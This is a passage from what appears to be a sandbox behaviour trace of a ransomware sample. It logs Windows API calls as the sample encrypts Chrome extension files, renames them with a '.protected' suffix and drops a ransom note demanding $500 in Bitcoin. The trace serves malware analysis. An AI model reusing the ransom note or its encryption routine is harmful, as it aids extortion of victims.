Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\RESTORE_FILES.txt") returned 161 [0079.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.895] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.895] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.896] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.896] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.896] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.896] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.896] CloseHandle (hObject=0x164) returned 1 [0079.896] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0079.896] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0079.897] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr") returned 143 [0079.897] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0079.897] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0079.897] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*") returned 145 [0079.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.897] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.897] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.897] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.897] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.897] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.897] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\.") returned 145 [0079.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.897] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.897] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.897] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.897] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.897] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.897] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.897] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\..") returned 146 [0079.897] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.897] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.897] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.897] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.898] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.898] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.898] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.898] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.898] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0079.898] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.898] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.899] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.899] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.900] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.900] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.900] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.900] CloseHandle (hObject=0x168) returned 1 [0079.900] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.protected") returned 167 [0079.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.protected")) returned 1 [0079.901] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.901] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.901] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\RESTORE_FILES.txt") returned 161 [0079.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.901] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.901] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.902] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.902] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.902] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.902] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.902] CloseHandle (hObject=0x164) returned 1 [0079.902] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.902] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0079.902] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0079.902] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0079.903] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0079.903] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0079.903] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk") returned 143 [0079.903] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0079.903] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0079.903] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*") returned 145 [0079.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.904] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.904] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.904] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\.") returned 145 [0079.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.904] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.904] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.904] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.904] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.904] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\..") returned 146 [0079.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.904] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.904] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.904] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.904] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.904] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.904] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.904] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.905] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.905] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.905] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.905] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.905] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0079.905] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.905] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.906] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.906] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.906] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.906] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.907] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.907] CloseHandle (hObject=0x168) returned 1 [0079.907] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.protected") returned 167 [0079.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.protected")) returned 1 [0079.908] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.908] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.908] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\RESTORE_FILES.txt") returned 161 [0079.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 